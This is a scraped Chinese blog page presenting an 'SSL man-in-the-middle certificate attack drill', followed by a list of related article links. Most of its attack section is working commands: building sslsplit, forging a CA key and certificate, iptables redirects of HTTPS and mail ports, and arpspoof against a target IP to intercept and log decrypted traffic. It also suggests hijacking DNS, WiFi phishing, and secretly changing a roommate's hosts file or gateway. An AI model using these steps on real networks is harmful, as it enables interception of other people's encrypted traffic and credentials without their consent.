SSL中间人证书攻击测试演练
来源:互联网 发布:电子书离线软件 编辑:程序博客网 时间:2024/05/20 11:26
git clone https://github.com/droe/sslsplit.git /opt/sslsplit
apt-get install libssl-dev libevent-dev
makemake install
1、ARP攻击进内网……还用我多说么?永恒的传奇,不老的ARP。2、DNS劫持将靶机的DNS劫持到这里来,想做什么就好说了。3、WIFI钓鱼拿着个树莓派改装版或者拿着菠萝瞎溜达,哪里人多找哪里。4、修改hosts文件把舍友暴打一顿,然后把他的电脑的hosts文件改掉,反正他也不懂。5、修改默认网关把舍友暴打一顿,然后把他的电脑的默认网关改成自己的IP,反正他也不懂。……
openssl genrsa -out ca.key 2048
openssl req -new -x509 -days 1096 -key ca.key -out ca.crt
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443
iptables -t nat -L
arpspoof -i eth0 -t 192.168.217.129 -r 192.168.217.2
arpspoof -i eth0 -t 192.168.217.129 -r 192.168.217.2
sslsplit -D -l connect.log -j /opt/sslsplit/test1 -S logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080
1、并不是所有的站点都会有这么明显的提示,经测试,部分国内某些权威的站点就不存在这样的提示。2、我们本次是本着科普的目的进行单纯的试验,证书完全是自己生成的。那么如果证书真的是权威机构颁发的呢?很贵么?3、目前我们的网络安全普及程度我想大家都看在眼里,并不是所有人都那么在乎这个红框框的,只要能用不就行了。另外,如果没记错,我们经常使用的买票的那谁的证书也不见得没问题吧,大家还不是照用不误,甚至给很多人以误导:这个提示是没用的,证书有错也是安全的,不信你看那谁.cn!相信你会无话可说。
0 0
- SSL中间人证书攻击测试演练
- SSL中间人证书攻击测试演练
- 通过伪造CA证书,实现SSL中间人攻击
- 通过伪造CA证书,实现SSL中间人攻击
- 通过伪造CA证书,实现SSL中间人攻击
- 通过伪造CA证书,实现SSL中间人攻击
- 通过伪造CA证书,实现SSL中间人攻击
- SSL中间人攻击(zt)
- SSL中间人攻击
- ssl中间人攻击
- SSL中间人攻击(MITM)
- 针对SSL的中间人攻击
- 针对SSL的中间人攻击
- 针对SSL的中间人攻击
- 针对SSL的中间人攻击
- SSL中间人攻击(MITM)
- Apache源码改造之SSL中间人攻击
- Apache源码改造之SSL中间人攻击
- 杭电 bestcoder#18 Bits Problem
- 信息安全领域相关术语介绍
- 2014年11月15日--11月23日(共17小时,剩7/409小时)
- DIV+CSS 入门
- c3p0连接池模板
- SSL中间人证书攻击测试演练
- “基于百度地图的巡检系统”的总结体会
- [转]MySQL 字段类型参考
- 单板吉他,音质还可以
- java真难啊
- TCP和UDP的区别(转)
- 猜数游戏
- 【DirecX 教程】Lesson 4: 窗口大小和客户区大小
- Storm杂谈之调度算法